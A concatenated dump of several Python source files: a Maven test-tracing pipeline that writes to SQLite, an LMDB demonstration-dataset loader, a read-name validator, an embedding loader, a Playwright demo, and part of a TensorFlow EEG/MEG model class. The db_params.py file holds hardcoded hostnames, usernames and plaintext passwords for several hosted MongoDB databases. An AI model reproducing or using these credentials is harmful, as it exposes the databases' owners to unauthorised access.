line_split))[0]\n methodname = methodname_w_brackets[:-2]\n tmethod_names.append(methodname)\n return tmethod_names\n\n @classmethod\n def parse_and_return_methodnameTannotations(cls, java_test_file_path):\n with open(java_test_file_path, 'r') as tfile:\n tree = cls.parser.parse_file(tfile)\n for type_decl in tree.type_declarations:\n methodnameTannotations = [] #(method_name, ['Test', 'Deprecated'])\n for method_decl in [decl for decl in type_decl.body if type(decl) is model.MethodDeclaration]:\n annotations = []\n for modifier in method_decl.modifiers:\n if type(modifier) is model.Annotation:\n annotations.append(modifier.name.value)\n methodnameTannotations.append((method_decl.name, annotations))\n return methodnameTannotations\n\n\ndef run_test(test_class_name, test_method_name):\n '''\n Example:\n test_class_name = FunctionUtilsTest\n test_method_name = testCompose\n '''\n command = f\"mvn surefire:test -Dtest={test_class_name}#{test_method_name}\"\n command = command.split(' ')\n logger.debug(f\"handling {test_class_name}, {test_method_name}\")\n output = subprocess.run(command, stdout=subprocess.PIPE, shell=True, cwd=PROJECT_ROOT_PATH)\n surefire_output = output.stdout.decode(encoding='utf-8', errors='ignore')\n return surefire_output\n\ndef route_traces_to_test_folder(tfile_name, tmethod_name):\n test_dir = f\"{DATA_PATH}\\\\{tfile_name}\\\\{tmethod_name}\"\n if not os.path.exists(test_dir):\n os.makedirs(test_dir)\n copyfile(src=TRACES_LOG_FILE_PATH, dst=f\"{test_dir}\\\\test_method_traces.log\")\n os.remove(TRACES_LOG_FILE_PATH)\n\ndef get_methodset_for_tmethod_traces(tmethod_dir_path): \n methodset = set()\n with open(f\"{tmethod_dir_path}\\\\test_method_traces.log\", 'r') as tmethod_file:\n for trace in tmethod_file:\n methodset.add(trace.split(',')[0])\n return methodset\n\ndef create_tmethod_info_files(tsuit_info):\n for tinfo in tsuit_info.tinfos:\n tmethod_dir_path = f\"{DATA_PATH}\\\\{tinfo.tfile_name}\\\\{tinfo.tmethod_name}\"\n methodset = get_methodset_for_tmethod_traces(tmethod_dir_path)\n with open(f\"{tmethod_dir_path}\\\\tmethod_info.log\", 'w') as tmethod_info_file:\n info = dict()\n info[\"methodset\"] = []\n for method in methodset:\n info[\"methodset\"].append(method)\n info[\"isFaulty\"] = tinfo.is_faulty\n tmethod_info_file.write(json.dumps(info))\n\ndef ingest_outcomes_into_sqlite(db, tsuit_info, map_from_methodfullname_to_guid):\n outcomes = [(map_from_methodfullname_to_guid[tinfo.tmethod_fullname], int(tinfo.is_faulty)) for tinfo in tsuit_info.tinfos]\n cursor.executemany('''INSERT INTO outcomes(tmid, is_faulty)\n VALUES(?,?)''', outcomes)\n db.commit()\n\ndef create_generator_from_logs(tmid, logs, map_from_methodfullname_to_guid):\n for log in logs:\n trace = Trace(tmid, log)\n trace.tmid = map_from_methodfullname_to_guid[trace.tmid]\n if trace.mid not in map_from_methodfullname_to_guid:\n map_from_methodfullname_to_guid[trace.mid] = str(uuid.uuid4())\n trace.mid = map_from_methodfullname_to_guid[trace.mid]\n yield (trace.tmid, trace.mid, trace.vector)\n\ndef ingest_traces_into_sqlite(db, tsuit_info, map_from_methodfullname_to_guid):\n for logfilename in glob.iglob(r\"C:\\personal-git\\Thesis\\ThesisScripts\\data\\**\\*.log\", recursive=True):\n tmid = '.'.join(logfilename.split('\\\\')[-3:-1])\n with open(logfilename, mode=\"r\") as logs:\n traces_generator = create_generator_from_logs(tmid, logs, map_from_methodfullname_to_guid)\n cursor.executemany('''INSERT INTO traces(tmid, mid, vector)\n VALUES(?,?,?)''', traces_generator)\n db.commit()\n\ndef ingest_methods_into_sqlite(db, map_from_methodfullname_to_guid):\n #flipping (method_id, method_name) intentionally\n values = [(method_id, method_name) for (method_name, method_id) in map_from_methodfullname_to_guid.items()]\n cursor.executemany('''INSERT INTO methods(method_id, method_name)\n VALUES(?,?)''', values)\n db.commit()\n\nlogger.info(\"\\n\\nstart\\n=================================================================================\\n\")\n\n\n#Step 1 (manual): introduce bug then `mvn package`\nBUG_ID = 1\nBUG_DESC = \"off by one in analysis/differentiation/GradientFunction.java\"\n\n#Step 2 (manual): find test classes that contain at least one failing test\n#build the project & run the the suite without the tracer (`mvn surefire:test`)\n#add every failing test class to TC_LIST\nTC_LIST = [ \n r\"C:\\personal-git\\apache\\commons-math\\src\\test\\java\\org\\apache\\commons\\math4\\analysis\\differentiation\\DerivativeStructureTest.java\"\n ]\n\n#Step 3: create SQLITE dataset\n#add the agent to the pom\n#Step 3.1: analyzing test-suit (create TestSuitInformation)\nstep1_desc = \"step 3.1: analyzing test-suit\"\nlogger.info(f\"\\n\\n{step1_desc}\\n=================================================================================\\n\")\nlogger.info(\"populating test-suit-information\")\n#populate test suit (get all test methods inside every test file)\ntsuit_info = TestSuitInformation(TC_LIST)\nlogger.info(f\"found total of {len(tsuit_info.tinfos)} methods in test suit\")\nlogger.info(\"filtering in only valid tests (e.g. only @Tests without @Deprecated or @Ignore)\")\ntsuit_info.filter_in_valid_tests()\nlogger.info(f\"total of {len(tsuit_info.tinfos)} valid test methods\")\n#Step 3.2: invoking individual tests with tracer\nstep2_desc = \"step 3.2: invoking individual tests with tracer\"\nlogger.info(f\"\\n\\n{step2_desc}\\n=================================================================================\\n\")\n#run each test to get results\npbar = ProgressBar(len(tsuit_info.tinfos))\npbar.show_current()\nfor tinfo in tsuit_info.tinfos:\n output = run_test(tinfo.tfile_name, tinfo.tmethod_name)\n tinfo.add_result_from_output(output)\n route_traces_to_test_folder(tinfo.tfile_name, tinfo.tmethod_name)\n pbar.advance(f\"({tinfo.tfile_name}, {tinfo.tmethod_name})\")\nlogger.info(f'each test class and test method tracer were stored at: \"{DATA_PATH}\"')\n#Step 3.3 filter (sample) tmethods with too many traces\nstep3_desc = f\"step 3.3: filter (sample) tmethods with traces bigger than {MAX_SIZE_FOR_TRACE_FILE_IN_MB} MB\"\nlogger.info(f\"\\n\\n{step3_desc}\\n=================================================================================\\n\")\nfiltered_count = tsuit_info.filter_out_big_trace_files(MAX_SIZE_FOR_TRACE_FILE_IN_MB)\nlogger.info(f'{filtered_count} tmethods were filtered (sampled) due to their size')\n#Step 3.4 output to SQLITE\nstep4_desc = \"step 3.4: output to sqlite\"\nlogger.info(f\"\\n\\n{step4_desc}\\n=================================================================================\\n\")\n#Step 3.4.1 setup SQLITE\nlogger.info(\"setting up SQLITE storage\")\ndb = sqlite3.connect(f\"{BUG_DBS_PATH}\\\\{BUG_ID}\")\ncursor = db.cursor()\ncursor.execute('''\n CREATE TABLE outcomes(\n tmid TEXT PRIMARY KEY, \n is_faulty INTEGER\n )\n''')\ndb.commit()\ncursor.execute('''\n CREATE TABLE traces(\n tmid TEXT, \n mid TEXT, \n vector TEXT, \n FOREIGN KEY(tmid) REFERENCES outcomes(tmid)\n )\n''')\ndb.commit()\ncursor.execute('''\n CREATE TABLE methods(\n method_id TEXT PRIMARY KEY, \n method_name TEXT\n )\n''')\ndb.commit()\n#Step 3.4.2 ingest\nmap_from_methodfullname_to_guid = dict()\nfor tinfo in tsuit_info.tinfos:\n if tinfo.tmethod_fullname not in map_from_methodfullname_to_guid:\n map_from_methodfullname_to_guid[tinfo.tmethod_fullname] = str(uuid.uuid4())\ningest_outcomes_into_sqlite(db, tsuit_info, map_from_methodfullname_to_guid)\ningest_traces_into_sqlite(db, tsuit_info, map_from_methodfullname_to_guid)\ningest_methods_into_sqlite(db, map_from_methodfullname_to_guid)\ndb.close()\nrmtree(DATA_PATH)","sub_path":"flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":13867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"647707102","text":"'''\nData structure of the input .npz:\nthe data is save in python dictionary format with keys: 'acs', 'ep_rets', 'rews', 'obs'\nthe values of each item is a list storing the expert trajectory sequentially\na transition can be: (data['obs'][t], data['acs'][t], data['obs'][t+1]) and get reward data['rews'][t]\n'''\n\nfrom baselines import logger\nimport numpy as np\nimport lmdb\nimport pickle\n\nimport os.path\nimport random\n\n\nclass LMDB_Dset(object):\n def __init__(self, expert_path, train_fraction=0.99, traj_limitation=-1, randomize=True):\n super(LMDB_Dset, self).__init__()\n self.data_path = expert_path\n self.train_fraction = train_fraction\n self.shuffle = randomize\n # Open the LMDB file\n with lmdb.open(self.data_path,\n readonly=True,\n lock=False,\n meminit=False) as env:\n\n with env.begin(write=False) as txn:\n self.demos_path = pickle.loads(txn.get(b'__demo_path__'))\n\n with lmdb.open(self.demos_path,\n readonly=True,\n lock=False,\n meminit=False) as env:\n\n with env.begin(write=False) as txn:\n self.keys = pickle.loads(txn.get(b'__keys__'))\n self.keys = sorted(self.keys, key=lambda x: -1 * pickle.loads(txn.get(x))['return'])\n self.length = len(self.keys)\n\n self.demo_env = None\n\n self.train_shuffled = [i for i in range(int(self.length*self.train_fraction))]\n self.eval_shuffled = [i for i in range(int(self.length - self.length*self.train_fraction))]\n self.shuffled = [i for i in range(self.length)]\n\n self.train_pointer = 0\n self.eval_pointer = 0\n self.pointer = 0\n\n def get_next_batch(self, batch_size, split=None):\n if split is None:\n inds = self.shuffled[self.pointer:self.pointer+batch_size]\n self.pointer += batch_size\n if self.pointer > len(self.shuffled):\n self.pointer = 0\n random.shuffle(self.shuffled)\n elif split == 'train':\n inds = self.train_shuffled[self.train_pointer:self.train_pointer+batch_size]\n self.train_pointer += batch_size\n if self.train_pointer > len(self.train_shuffled):\n self.train_pointer = 0\n random.shuffle(self.train_shuffled)\n elif split == 'val':\n inds = self.eval_shuffled[self.eval_pointer:self.eval_pointer+batch_size]\n self.eval_pointer += batch_size\n if self.eval_pointer > len(self.eval_shuffled):\n self.eval_pointer = 0\n random.shuffle(self.eval_shuffled)\n else:\n raise NotImplementedError\n\n samples = [self[idx] for idx in inds]\n\n states, actions = list(zip(*samples))\n\n return np.transpose(np.concatenate(states), (0, 3, 1, 2)), np.concatenate(actions)\n\n\n def __getitem__(self, idx):\n if self.demo_env is None:\n self.demo_env = lmdb.open(self.demos_path,\n readonly=True,\n lock=False,\n meminit=False)\n\n with self.demo_env.begin(write=False) as txn:\n traj = pickle.loads(txn.get(self.keys[idx]))\n\n states = traj['states']\n actions = traj['actions']\n\n states = np.array(states, dtype=np.float32)/255.0\n actions = np.array(actions, dtype=np.int32)\n\n return states, actions\n\n\n\n\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--expert_path\", type=str, default=\"../data/deterministic.trpo.Hopper.0.00.npz\")\n parser.add_argument(\"--traj_limitation\", type=int, default=None)\n parser.add_argument(\"--plot\", type=bool, default=False)\n args = parser.parse_args()\n print(args)\n","sub_path":"atari/baselines/baselines/gail/dataset/lmdb_dset.py","file_name":"lmdb_dset.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"518572960","text":"import rnftools.rnfformat\nimport re\n\nreg_lrn = re.compile(r\"^([!-?A-^`-~]*)__([0-9a-f]+)__([!-?A-^`-~]+)__([!-?A-^`-~]*)$\")\nreg_prefix_part = re.compile(r\"^[!-?A-^`-~]*$\")\nreg_id_part = re.compile(r\"^[0-9a-f]+$\")\nreg_segmental_part = re.compile(r\"^(?:(\\([0-9FRN,]*\\))(?:,(?!$)|$))+$\")\nreg_suffix_part = re.compile(r\"^(?:((?:[a-zA-Z0-9]+:){0,1})\\[([!-?A-Z\\\\^`-~]*)\\](?:,(?!$)|$))+$\")\nreg_segment = re.compile(r\"^\\(([0-9]+),([0-9]+),([FRN]),([0-9]+),([0-9]+)\\)$\")\nreg_comment = re.compile(r\"^\\[([!-?A-Z\\\\^`-~]*)\\]$\")\nreg_extension = re.compile(r\"^\\[([!-?A-Z\\\\^`-~]*)\\]$\")\n\n\nclass Validator:\n\t\"\"\"Class for validation of RNF.\n\n\tArgs:\n\t\tinitial_read_tuple_name (str): Initial read tuple name to detect profile (widths).\n\t\treport_only_first (bool): Report only first occurrence of every error.\n\t\twarnings_as_errors (bool): Treat warnings as errors (error code).\n\t\"\"\"\n\n\tdef __init__(\n\t\t\tself,\n\t\t\tinitial_read_tuple_name,\n\t\t\treport_only_first=True,\n\t\t\twarnings_as_errors=False,\n\t):\n\t\tself.report_only_first = report_only_first\n\t\tself.reported_errors = set()\n\t\tself.error_has_been_reported = False\n\t\tself.warning_has_been_reported = False\n\t\tself.warnings_as_errors = warnings_as_errors\n\n\t\tself.rnf_profile = rnftools.rnfformat.RnfProfile(read_tuple_name=initial_read_tuple_name)\n\n\tdef validate(self, read_tuple_name):\n\t\t\"\"\"Check RNF validity of a read tuple.\n\n\t\tArgs:\n\t\t\tread_tuple_name (str): Read tuple name to be checked.s\n\t\t\"\"\"\n\t\tif reg_lrn.match(read_tuple_name) is None:\n\t\t\tself.report_error(\n\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\terror_name=\"wrong_read_tuple_name_structure\",\n\t\t\t\tmessage=\"'{}' is not matched\".format(reg_lrn),\n\t\t\t)\n\t\telse:\n\t\t\tparts = read_tuple_name.split(\"__\")\n\n\t\t\tif reg_prefix_part.match(parts[0]) is None:\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_prefix_part\",\n\t\t\t\t\tmessage=\"'{}' is not matched\".format(reg_prefix_part),\n\t\t\t\t)\n\n\t\t\tif reg_id_part.match(parts[1]) is None:\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_id_part\",\n\t\t\t\t\tmessage=\"'{}' is not matched\".format(reg_id_part),\n\t\t\t\t)\n\n\t\t\tif reg_segmental_part.match(parts[2]) is None:\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_segmental_part\",\n\t\t\t\t\tmessage=\"'{}' is not matched\".format(reg_segmental_part),\n\t\t\t\t)\n\n\t\t\tif reg_suffix_part.match(parts[3]) is None:\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_suffix_part\",\n\t\t\t\t\tmessage=\"'{}' is not matched\".format(reg_suffix_part),\n\t\t\t\t)\n\n\t\t\tif not self.rnf_profile.check(read_tuple_name):\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_profile\",\n\t\t\t\t\tmessage=\"Read has a wrong profile (wrong widths). It should be: {} but it is: {}.\".format(\n\t\t\t\t\t\tself.rnf_profile,\n\t\t\t\t\t\trnftools.rnfformat.RnfProfile(read_tuple_name=read_tuple_name),\n\t\t\t\t\t),\n\t\t\t\t\twarning=True,\n\t\t\t\t)\n\n\tdef get_return_code(self):\n\t\t\"\"\"Get final return code (0 = ok, 1=error appeared).\n\t\t\"\"\"\n\t\tif self.error_has_been_reported:\n\t\t\treturn 1\n\t\tif self.warning_has_been_reported and self.warnings_as_errors:\n\t\t\treturn 1\n\n\tdef report_error(\n\t\t\tself,\n\t\t\tread_tuple_name,\n\t\t\terror_name,\n\t\t\twrong=\"\",\n\t\t\tmessage=\"\",\n\t\t\twarning=False\n\t):\n\t\t\"\"\"Report an error.\n\n\t\tArgs:\n\t\t\tread_tuple_name (): Name of the read tuple.\n\t\t\terror_name (): Name of the error.\n\t\t\twrong (str): What is wrong. \n\t\t\tmessage (str): Additional msessage to be printed.\n\t\t\twarning (bool): Warning (not an error).\n\t\t\"\"\"\n\t\tif (not self.report_only_first) or (error_name not in self.reported_errors):\n\t\t\tprint(\"\\t\".join([\"error\" if warning == False else \"warning\", read_tuple_name, error_name, wrong, message]))\n\t\tself.reported_errors.add(error_name)\n\t\tif warning:\n\t\t\tself.warning_has_been_reported = True\n\t\telse:\n\t\t\tself.error_has_been_reported = True\n","sub_path":"rnftools/rnfformat/Validator.py","file_name":"Validator.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"300552189","text":"import numpy as np\nimport pickle, codecs\n\ndef BioAsqtypes2word2iddict(typestxtpath):\n word2id = {}\n id2word = {}\n\n with open(typestxtpath,'r') as tyt:\n for line in tyt:\n oneword = line.strip()\n\n word2id[oneword] = len(word2id)\n id2word[(len(id2word))] = oneword\n word2id['<UNK>'] = len(word2id)\n id2word[len(id2word)] = '<UNK>'\n\n word2id['<PAD>'] = len(word2id)\n id2word[len(id2word)] = '<PAD>'\n\n return word2id, id2word\n\ndef BioAsQ2array(embeddingvectorpath,word2id_dic, id2word_dic):\n word2embeddict = {}\n word_embeds_init_matrix = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word2id_dic), 200))\n word_embeds_init_matrix[-1][0:200] = np.array([0 for i in range(200)])\n\n\n for i, line in enumerate(codecs.open(embeddingvectorpath, 'r', encoding='utf-8')):\n s = line.strip().split()\n word2embeddict[id2word_dic[i]] = np.array([float(j) for j in s[0:]])\n # dimension = 200\n\n return word2embeddict, word_embeds_init_matrix\n\nif __name__ == '__main__':\n TYPESTXTPATH = './../pretrained_embeddings/embeddings_BioAsQ/types.txt'\n EMBEDTXTPATH = './../pretrained_embeddings/embeddings_BioAsQ/vectors.txt'\n\n word2id, id2word = BioAsqtypes2word2iddict(typestxtpath=TYPESTXTPATH)\n word2embeddingdict, wordmatrix = BioAsQ2array(embeddingvectorpath=EMBEDTXTPATH,\n word2id_dic=word2id,\n id2word_dic=id2word)\n bioasq_embeddingpath = './../pretrained_embeddings/embeddings_BioAsQ/bioasq_allembedding.pkl'\n\n with open(bioasq_embeddingpath,'wb') as be:\n all_data_json = {'word2id':word2id,\n 'id2word':id2word,\n 'word2embed':word2embeddingdict,\n 'wordmatrix':wordmatrix}\n pickle.dump(all_data_json,be)\n print('dump end')\n\n\n\n","sub_path":"CRAFT2GO/BioAsQembeddingloader.py","file_name":"BioAsQembeddingloader.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"382357257","text":"#!/usr/bin/env python\n\n# Author: Steven Dang stevencdang.com\n\n########## MongoHQ databases ##############\n# Need to modify this so that the user and password are stored separately\nideagenstest = {'url': \"kahana.mongohq.com\",\n 'port': 10056,\n 'dbName': 'IdeaGensTest',\n 'user': 'sandbox',\n 'pswd': 'protolab1'\n }\n# user and paswd are incorrect (do not want to commit secure info\nideagensscd = {'url': \"ds045031.mongolab.com\",\n 'port': 45031,\n 'dbName': 'ideagensscd',\n 'user': 'heroku',\n 'pswd': 'j4!g#RV$nAr5&FBq$BK$',\n }\n\nideagens = {'url': \"kahana.mongohq.com\",\n 'port': 10075,\n 'dbName': 'IdeaGens',\n 'user': 'experimenter',\n 'pswd': '1#dJ3VYSf8Sn5iE9'\n }\n\nchi1 = {'url': \"kahana.mongohq.com\",\n 'port': 10010,\n 'dbName': 'CHI1',\n 'user': 'proto1',\n 'pswd': 'lTwI9iiTm7'\n }\n\nfac_exp = {'url': \"ds043981.mongolab.com\",\n 'port': 43981,\n 'dbName': 'joelcprotolab',\n 'user': 'joelc',\n 'pswd': 'lnC00K=beta{5}'\n }\n\nhumandatabank = {'url': \"ds041327.mongolab.com\",\n 'port': 41327,\n 'dbName': 'human_data_bank',\n 'user': 'heroku',\n 'pswd': 'j4!g#RV$nAr5&FBq$BK$',\n }\n\nsynth_exp = {'url': \"ds033097.mongolab.com\",\n 'port': 33097,\n 'dbName': 'joelc-ideagens2',\n 'user': 'joelc',\n 'pswd': 'lnC00K=beta{5}'\n }\n\nkalign = {'url': \"ds055535.mlab.com\",\n 'port': 55535,\n 'dbName': 'kalign',\n 'user': 'joelc',\n 'pswd': 'lnC00K=beta{5}'\n }\n\n# Info for connecting to a local instance of meteor's mongo.\n# Meteor must be running to connect\nlocal_meteor = {'url': \"localhost\",\n 'port': 3001,\n 'dbName': 'meteor',\n 'user': '',\n 'pswd': '',\n}\n\nALL_DBs = {'ideagens': ideagens,\n 'ideagenstest': ideagenstest,\n 'chi1': chi1,\n 'fac_exp': fac_exp,\n 'local': local_meteor,\n 'ideagensscd': ideagensscd,\n 'synth_exp': synth_exp,\n 'kalign': kalign,\n 'local_meteor': local_meteor,\n }\n\n","sub_path":"private/scripts/db_params.py","file_name":"db_params.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"641944500","text":"import re\nfrom playwright.sync_api import Playwright, sync_playwright, expect\n\n\ndef run(playwright: Playwright) -> None:\n browser = playwright.chromium.launch(headless=False)\n context = browser.new_context()\n page = context.new_page()\n page.goto(\"https://playwright.dev/\")\n # Expect a title \"to contain\" a substring.\n expect(page).to_have_title(re.compile(\"Playwright\"))\n # create a locator\n get_started = page.get_by_role(\"link\", name=\"Get started\")\n # Expect an attribute \"to be strictly equal\" to the value.\n expect(get_started).to_have_attribute(\"href\", \"/docs/intro\")\n # Click the get started link.\n get_started.click()\n page.wait_for_timeout(3000)\n # Expects the URL to contain intro.\n expect(page).to_have_url(re.compile(\".*intro\"))\n\n # ---------------------\n context.close()\n browser.close()\n\n\nwith sync_playwright() as playwright:\n run(playwright)\n\n\n# ---------------------\n","sub_path":"demo_plawwright.py","file_name":"demo_plawwright.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"244193489","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDefines mneflow.models.Model parent class and the implemented models as its\nsubclasses. Implemented models inherit basic methods from the parent class.\n\n\"\"\"\nfrom .layers import ConvDSV, Dense, vgg_block, LFTConv, VARConv, DeMixing\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.covariance import ledoit_wolf\n\n\nclass Model(object):\n \"\"\"\n Parent class for all MNEflow models\n\n Provides fast and memory-efficient data handling and simplified API.\n Custom models can be built by overriding _build_graph and\n set_optimizer methods.\n\n \"\"\"\n def __init__(self, Dataset, Optimizer, specs):\n \"\"\"\n Parameters\n -----------\n Dataset : mneflow.Dataset\n Dataset object.\n\n Optimizer : mneflow.Optimizer\n Optimizer object.\n\n specs : dict\n dictionary of model-specific hyperparameters. Must include at\n least model_path - path for saving a trained model. See\n subclass definitions for details.\n\n \"\"\"\n\n self.specs = specs\n self.model_path = specs['model_path']\n if Dataset.h_params['task'] == 'classification':\n self.n_classes = Dataset.h_params['n_classes']\n else:\n self.y_shape = Dataset.h_params['y_shape']\n self.fs = Dataset.h_params['fs']\n self.sess = tf.Session()\n self.handle = tf.placeholder(tf.string, shape=[])\n self.train_iter, self.train_handle = self._start_iterator(Dataset.train)\n self.val_iter, self.val_handle = self._start_iterator(Dataset.val)\n\n self.iterator = tf.data.Iterator.from_string_handle(self.handle, Dataset.train.output_types, Dataset.train.output_shapes)\n self.X, self.y_ = self.iterator.get_next()\n self.rate = tf.placeholder(tf.float32, name='rate')\n self.dataset = Dataset\n self.optimizer = Optimizer\n\n def _start_iterator(self, Dataset):\n\n \"\"\"\n Builds initializable iterator and string handle.\n \"\"\"\n\n ds_iterator = Dataset.make_initializable_iterator()\n handle = self.sess.run(ds_iterator.string_handle())\n self.sess.run(ds_iterator.initializer)\n return ds_iterator, handle\n\n def build(self):\n\n \"\"\"\n Compile a model\n\n \"\"\"\n\n # Initialize computational graph\n self.y_pred = self.build_graph()\n print('y_pred:', self.y_pred.shape)\n # Initialize optimizer\n self.saver = tf.train.Saver(max_to_keep=1)\n opt_handles = self.optimizer.set_optimizer(self.y_pred, self.y_)\n self.train_step, self.accuracy, self.cost, self.p_classes = opt_handles\n print('Initialization complete!')\n\n def build_graph(self):\n\n \"\"\"\n Build computational graph using defined placeholder self.X as input\n\n Can be overriden in a sub-class for customized architecture.\n\n Returns\n --------\n y_pred : tf.Tensor\n output of the forward pass of the computational graph.\n prediction of the target variable\n\n \"\"\"\n print('Specify a model. Set to linear classifier!')\n fc_1 = Dense(size=self.n_classes, nonlin=tf.identity,\n dropout=self.rate)\n y_pred = fc_1(self.X)\n return y_pred\n\n def train(self, n_iter, eval_step=250, min_delta=1e-6, early_stopping=3):\n \"\"\"\n Trains a model\n\n Parameters\n -----------\n\n n_iter : int\n maximum number of training iterations.\n\n eval_step : int\n How often to evaluate model performance during training.\n\n early_stopping : int\n Patience parameter for early stopping. Specifies the number of\n 'eval_step's during which validation cost is allowed to rise\n before training stops.\n\n min_delta : float\n Convergence threshold for validation cost during training.\n Defaults to 0.\n \"\"\"\n self.sess.run(tf.global_variables_initializer())\n min_val_loss = np.inf\n\n patience_cnt = 0\n for i in range(n_iter+1):\n _, t_loss, acc = self.sess.run([self.train_step, self.cost, self.accuracy],\n feed_dict={self.handle: self.train_handle,\n self.rate: self.specs['dropout']})\n if i % eval_step == 0:\n self.dataset.train.shuffle(buffer_size=10000)\n self.v_acc, v_loss = self.sess.run([self.accuracy, self.cost],\n feed_dict={self.handle: self.val_handle,\n self.rate: 1.})\n\n if min_val_loss >= v_loss + min_delta:\n min_val_loss = v_loss\n v_acc = self.v_acc\n self.saver.save(self.sess, ''.join([self.model_path,\n self.scope, '-',\n self.dataset.h_params['data_id']]))\n else:\n patience_cnt += 1\n print('* Patience count {}'.format(patience_cnt))\n if patience_cnt >= early_stopping:\n print(\"early stopping...\")\n self.saver.restore(self.sess, ''.join([self.model_path,\n self.scope, '-',\n self.dataset.h_params['data_id']]))\n print('stopped at: epoch %d, val loss %g, val acc %g'\n % (i, min_val_loss, v_acc))\n break\n print('i %d, tr_loss %g, tr_acc %g v_loss %g, v_acc %g'\n % (i, t_loss, acc, v_loss, self.v_acc))\n\n def load(self):\n \"\"\"\n Loads a pretrained model\n\n To load a specific model the model object should be initialized using\n the corresponding metadata and computational graph\n \"\"\"\n\n self.saver.restore(self.sess, ''.join([self.model_path,\n self.scope, '-',\n self.dataset.h_params['data_id']]))\n self.v_acc = self.sess.run([self.accuracy],\n feed_dict={self.handle: self.val_handle,\n self.rate: 1.})\n\n def evaluate_performance(self, data_path, batch_size=None):\n \"\"\"\n Compute performance metric on a TFR dataset specified by path\n\n Parameters\n ----------\n data_path : str, list of str\n path to .tfrecords file(s).\n\n batch_size : NoneType, int\n whether to split the dataset into batches.\n \"\"\"\n test_dataset = self.dataset._build_dataset(data_path,\n n_batch=batch_size)\n test_iter, test_handle = self._start_iterator(test_dataset)\n acc = self.sess.run(self.accuracy, feed_dict={self.handle: test_handle,\n self.rate: 1.})\n print('Finished: acc: %g +\\\\- %g' % (np.mean(acc), np.std(acc)))\n return np.mean(acc)\n\n def predict(self, data_path=None, batch_size=None):\n \"\"\"\n Compute performance metric on a TFR dataset specified by path\n\n Parameters\n ----------\n data_path : str, list of str\n path to .tfrecords file(s).\n\n batch_size : NoneType, int\n whether to split the dataset into batches.\n \"\"\"\n if data_path:\n test_dataset = self.dataset._build_dataset(data_path,\n n_batch=batch_size)\n test_iter, test_handle = self._start_iterator(test_dataset)\n else:\n test_iter, test_handle = self._start_iterator(self.dataset.val)\n pred, true = self.sess.run([self.y_pred, self.y_],\n feed_dict={self.handle: test_handle,\n self.rate: 1.})\n return pred, true\n\n# def evaluate_realtime(self, data_path, batch_size=None, step_size=1):\n#\n# \"\"\"Compute performance metric on a TFR dataset specified by path\n# batch by batch with updating the model after each batch \"\"\"\n#\n# prt_batch_pred = []\n# prt_logits = []\n# n_test_points = batch_size//step_size\n# count = 0\n#\n# test_dataset = tf.data.TFRecordDataset(data_path).map(self._parse_function)\n# test_dataset = test_dataset.batch(step_size)\n# test_iter = test_dataset.make_initializable_iterator()\n# self.sess.run(test_iter.initializer)\n# test_handle = self.sess.run(test_iter.string_handle())\n#\n# while True:\n# try:\n# self.load()\n# count += 1\n# preds = 0\n# for jj in range(n_test_points):\n# pred, probs = self.sess.run([self.correct_prediction,\n# self.p_classes],\n# feed_dict={self.handle: test_handle,\n# self.rate: 1})\n# self.sess.run(self.train_step,\n# feed_dict={self.handle: test_handle,\n# self.rate: self.specs['dropout']})\n# preds += np.mean(pred)\n# prt_logits.append(probs)\n# prt_batch_pred.append(preds/n_test_points)\n# except tf.errors.OutOfRangeError:\n# print('prt_done: count: %d, acc: %g +\\\\- %g'\n# % (count, np.mean(prt_batch_pred), np.std(prt_batch_pred)))\n# break\n# return prt_batch_pred, np.concatenate(prt_logits)\n\n def plot_cm(self, dataset='validation', class_names=None, normalize=False):\n\n \"\"\"\n Plot a confusion matrix\n\n Parameters\n ----------\n\n dataset : str {'training', 'validation'}\n which dataset to use for plotting confusion matrix\n\n class_names : list of str, optional\n if provided subscribes the classes, otherwise class labels\n are used\n\n normalize : bool\n whether to return percentages (if True) or counts (False)\n \"\"\"\n\n from matplotlib import pyplot as plt\n from sklearn.metrics import confusion_matrix\n import itertools\n if dataset == 'validation':\n feed_dict = {self.handle: self.val_handle, self.rate: 1.}\n elif dataset == 'training':\n feed_dict = {self.handle: self.train_handle, self.rate: 1.}\n y_true, y_pred = self.sess.run([self.y_, self.p_classes],\n feed_dict=feed_dict)\n y_pred = np.argmax(y_pred, 1)\n f = plt.figure()\n cm = confusion_matrix(y_true, y_pred)\n title = 'Confusion matrix'\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.title(title)\n ax = f.gca()\n ax.set_ylabel('True label')\n ax.set_xlabel('Predicted label')\n plt.colorbar()\n if not class_names:\n class_names = np.arange(len(np.unique(y_true)))\n tick_marks = np.arange(len(class_names))\n plt.xticks(tick_marks, class_names, rotation=45)\n plt.yticks(tick_marks, class_names)\n\n fmt = '.2f' if normalize else 